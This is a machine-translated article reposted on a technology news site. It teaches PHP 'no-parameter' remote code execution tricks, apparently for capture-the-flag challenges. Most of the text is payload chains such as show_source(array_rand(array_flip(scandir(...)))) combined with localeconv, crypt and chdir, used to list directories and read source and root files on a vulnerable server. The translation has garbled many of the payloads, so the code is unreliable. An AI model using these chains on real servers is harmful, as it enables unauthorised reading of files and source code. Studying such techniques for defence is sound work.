In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-30 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
It is believed that many inexperienced people are at a loss about how to understand the non-parameter reading file in php rce. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.
1. What is no parameter?
That is, you cannot use a function with arguments.
It can be a (), a (b ()) or a (b (c (), but it cannot be a ('b') or a ('baked dint') with no parameters.
So we need to use functions with no arguments for file reading or command execution.
Second, no parameter file reading
View the current directory file name
In general, you can use print_r (scandir ('.')) View all files in the current directory and output as an array.
But how to construct this point in the parameter.
The localeconv () function returns an array of local numbers and currency format information. And the first item of the array is.
Https://www.w3school.com.cn/php/func_string_localeconv.asp
Current () returns the cells in the array, default to the first value.
So we output print_r (scandir (current (localeconv (); it will also be like print_r (scandir ('.')). Print the file name under the current directory.
Use print_r (scandir (pos (localeconv ();, pos is an alias for current
The reset () function points the internal pointer to the first element in the array and outputs it.
Related methods:
So now we're going to construct the parameters of reset ().
Chr (46) is the character.. So we need to construct 46.
Chr (rand ()) # depends on luck. Unrealistic char (time ()) char (current (localtime (time ()
[tm_sec]-seconds
[tm_min]-minutes
[tm_hour]-hour
[tm_mday]-the day of the month
[tm_mon]-the month ordinal of the year, indicating January from 0
[tm_year]-year, starting from 1900
[tm_wday]-Day of the week (Sunday=0)
[tm_yday]-Day of the year
[tm_isdst]-whether daylight saving time is currently in effect
Chr (time ())
The chr () function has a period of 256, so chr (46), chr (302) and chr (558) are all equal to.
So using chr (time ()) must occur once a cycle.
Chr (current (localtime (time ()
Localtime () outputs the local time as a numeric array and an associative array:
The key name of the associative array is as follows:
The first value of the array is added by 1 per second, so you can get 46. 5% in 60 seconds at most. Then use the current () function to get the first key value. Then you can get it perfectly by using the chr () function.
Current ()-returns the value of the current element in the array
End ()-points the internal pointer to the last element in the array and outputs
Next ()-points the internal pointer to the next element in the array and outputs
Prev ()-points the internal pointer to the previous element in the array and outputs
Each ()-returns the key name and key value of the current element and moves the internal pointer forward
Phpversion () returns the PHP version, for example 5.4.45
Floor (phpversion ()) returns 5
Sqrt (floor (phpversion () returns 2.2360679774998
Tan (floor (sqrt (floor (phpversion ()) returns-2.1850398632615)
Cosh (tan (floor (sqrt (floor (phpversion ()) returns 4.5017381103491)
Sinh (cosh (tan (floor) (sqrt (floor (phpversion ()) returns 45.081318677156
Ceil (sinh (cosh (tan) (floor) (sqrt (floor (phpversion ()) returns 46
Chr (ceil (sinh (cosh) (floor (phpversion ()) returns "."
Crypt () returns a string encrypted using the DES, Blowfish, or MD5 algorithm.
The hebrevc () function converts Hebrew text from a right-to-left stream to a left-to-right stream. At the same time, convert the new line (\ n) to
Hebrevc (crypt (arg)) can randomly generate a hash value, and the first character is randomly $(high probability) or "." (small probability) then only the first character / is fetched through chr (ord ())
Ord () returns the Ascii value of the first character in the string
Print_r (scandir (chr (ord) (hebrevc (crypt (time ()); try several times.
Strrev (crypt (serialize (array () can also get "." except that the dot of crypt (serialize (array () appears in the last character, you need to use strrev () in reverse order, and then use chr (ord ()) to get the first character.
Print_r (scandir (chr (ord) (strrev (crypt) (array ())
Absolute path
Normally, we can also use print_r (scandir ('absolute path'); to view the current directory file name.
Getcwd () and realpath ('.') are available to get the absolute path.
So we can also use print_r (scandir (getcwd (); to output all the file names of the current folder.
Read the current directory file
The file name of the current directory is output by the previous method. If the file cannot be displayed directly, such as PHP source code, we also need to use the function to read:
The previous method outputs an array, and the file name is the value of the array, so how do we get out the array that we want to read the file?
To get the contents of the last file, we can:
Show_source (end (scandir (getcwd (); # or use other functions readfilehighlight_filefile_get_contentsreadgzfile () # can also read files, often used to bypass filtering
Error Strict Standards: Only variables should be passed by reference in reason: the above PHP5.3 can only pass specific variables by default, but not through the returned value of the function. It does not affect us to read the file.
Array_reverse () returns the array in the reverse order of elements
The file that was originally in the last bit can be read in the first place.
Show_source (current (array_reverse (scandir (getcwd))
If it's the penultimate one, we can use:
Readfile (next (array_reverse (scandir (getcwd))
I thought I could continue to use next (), but it didn't work.
So how to read other files
We can use array_rand (array_flip ()), where array_flip () is the key and value of the swap array, and array_rand () returns an array at random.
Readfile (array_rand (array_flip (scandir (getcwd ()); readfile (array_rand (array_flip (current (localeconve ()
What if the target file is not in the current directory?
Dirname (): returns the directory portion of the path
As you can see from the figure, if the value passed in is an absolute path (excluding the file name), the upper path is returned, and if the absolute path is passed in the file name, the current path of the file is returned.
Chdir (): change the current working directory
Print_r (scandir (dirname (getcwd (); / / View the files in the directory above
Construct ".."
Print_r (next (scandir (getcwd ();: the second array in our scandir (getcwd ()) is "..", so you can get it with next ().
Print_r (scandir (next (scandir (getcwd ()); / / you can also view the superior directory file
Combined with some of the structures mentioned above, we can get ".." Of:
Next (scandir (chr (ord) (hebrevc (crypt (time ())
Read the parent directory file
Direct print_r (readfile (array_rand (scandir (dirname (getcwd ();)) is not allowed, and an error will be reported, because the default is to find and read this file in the current working directory, and the file is in the upper directory, so change the current working directory first, write chdir () before, and use:
Show_source (array_rand (array_flip (scandir) (dirname (chdir) (getcwd ())
If you cannot use dirname (), you can use the construct ".." Switch paths and read:
But here getcwd () and localeconv () cannot accept parameters after switching paths, because syntax does not allow us to use the previous hebrevc (crypt (arg)).
Show_source (array_rand (scandir (chr) (ord (crypt (chdir (scandir (getcwd ()); or more complex: show_source (array_rand (array_flip (scandir) (ord (hebrevc (chdir (scandir (chr)) (hebrevc (crypt (phpversion () You can also use show_source (array_rand (scandir (scandir (current) (localtime (chdir (chdir (scandir (localeconv (), otherwise the manual refresh will take a long time. If the file is positive or penultimate, it is best to locate it directly.
And:
If (chdir (next (scandir (getcwd () show_source) array_rand (array_flip (getcwd ())
View and read root directory files
Print_r (scandir (chr (ord) (strrev (crypt) (array ())
The first bit of a string obtained by strrev (crypt (serialize (array () is likely to be /, so you can use the above payload to view the root directory file.
But there are permission restrictions, the linux system needs certain permissions to read, so it may not be successful.
If (chdir (ord) (strrev (crypt (serialize (array () print_r (scandir (getcwd (); if (chdir (ord (strrev (serialize (array) show_source) (array_rand (scandir (getcwd ()
The array_flip () function is used to reverse / exchange the key name and the corresponding associated key value in the array.
The array_rand () function returns random key names in an array, or an array containing random key names if you specify that the function return more than one key name.
End ()-points the internal pointer of the array to the last cell
Key ()-gets the key name from the associative array
Each ()-returns the current key / value pair in the array and moves the array pointer one step forward
Prev ()-reverses the internal pointer of the array to one bit
Reset ()-points the internal pointer of the array to the first cell
Next ()-moves the internal pointer in the array forward one bit
Using wildcard temporary files
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.